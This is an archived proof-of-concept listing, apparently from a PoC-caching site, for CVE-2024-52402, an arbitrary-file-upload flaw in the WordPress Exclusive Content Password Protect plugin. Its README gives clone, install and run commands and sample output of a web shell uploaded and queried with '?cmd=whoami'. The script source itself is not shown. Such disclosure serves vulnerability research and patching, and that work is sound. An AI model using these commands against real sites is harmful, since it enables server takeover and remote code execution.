CVE-2024-52402 PoC — WordPress plugin Exclusive Content Password Protect 跨站请求伪造漏洞

Source

https://github.com/Nxploited/CVE-2024-52402

Associated Vulnerability

Title:WordPress plugin Exclusive Content Password Protect 跨站请求伪造漏洞 (CVE-2024-52402)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Exclusive Content Password Protect 1.1.0版本及之前版本存在跨站请求伪造漏洞。攻击者利用该漏洞可以执行跨站请求伪造攻击。

Description

 WordPress Exclusive Content Password Protect plugin <= 1.1.0 - CSRF to Arbitrary File Upload vulnerability

Readme

# 🚀 Exploit for CVE-2024-52402: WordPress Exclusive Content Password Protect Plugin <= 1.1.0

## 🛡️ Overview

This exploit targets a Cross-Site Request Forgery (CSRF) vulnerability in the WordPress Exclusive Content Password Protect plugin, versions up to and including 1.1.0. This vulnerability allows an attacker to upload a web shell to the web server, leading to potential remote code execution.

### 📅 Details

- **Published:** 2024-11-19
- **CVE ID:** CVE-2024-52402
- **Plugin Version:** Exclusive Content Password Protect <= 1.1.0
- **Severity:** CRITICAL (CVSS 9.6)


## ⚙️ Usage

To exploit this vulnerability, you need to provide the target WordPress site URL, a valid WordPress username, and password. The exploit script will log in to the WordPress site and attempt to upload a web shell.

### 🔧 Command

```sh
python CVE-2024-52402.py -u <target> -un <username> -p <password>
```

### 🛠️ Options

```
usage: CVE-2024-52402.py [-h] -u URL -un USERNAME -p PASSWORD

Exploit for ECVE-2024-52402 By | Nxploit, Khaled ALenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress site URL
  -un, --username USERNAME
                        WordPress username
  -p, --password PASSWORD
                        WordPress password
```

### 🌟 Example

```sh
python CVE-2024-52402.py -u http://target/wordpress -un admin -p admin
```

## 🚀 Output Example

```sh
[+] Plugin version detected: 1.1.0
[+] Logged in successfully.
[!] Exploit completed! Web Shell uploaded: http://target/wordpress/wp-content/uploads/nxploit.php
[*] Test with: http://target/wordpress/wp-content/uploads/nxploit.php?cmd=whoami
```

## 📜 Description



This script exploits the CSRF vulnerability in the Exclusive Content Password Protect plugin to upload a Web Shell
 to the WordPress server. However, it does not execute a CSRF attack 
directly; instead, it focuses on leveraging the plugin’s file upload 
functionality to achieve exploitation.
## 👨‍💻 How to Run the Script

1. **Clone the Repository**
   ```sh
   git clone https://github.com/Nxploited/CVE-2024-52402.git
   cd CVE-2024-52402
   ```

2. **Install Requirements**
   Ensure you have `requests` library installed:
   ```sh
   pip install requests
   ```

3. **Run the Script**
   Use the following command to execute the script:
   ```sh
   python CVE-2024-52402.py -u http://target/wordpress -un admin -p admin
   ```

## 🛡️ Mitigation

To mitigate this vulnerability, update the Exclusive Content Password Protect plugin to the latest version where this issue has been fixed.

## ⚠️ Disclaimer

This script is intended for educational purposes only. Unauthorized use of this script against systems that you do not have explicit permission to test is illegal and unethical.


***Exploit By: Nxploit , Khaled alenazi.***

File Snapshot


 [4.0K]  /data/pocs/44d972dcfe3a13c84c8363aab6c60bd50460d0f0
├── [3.7K]  CVE-2024-52402.py
└── [2.8K]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!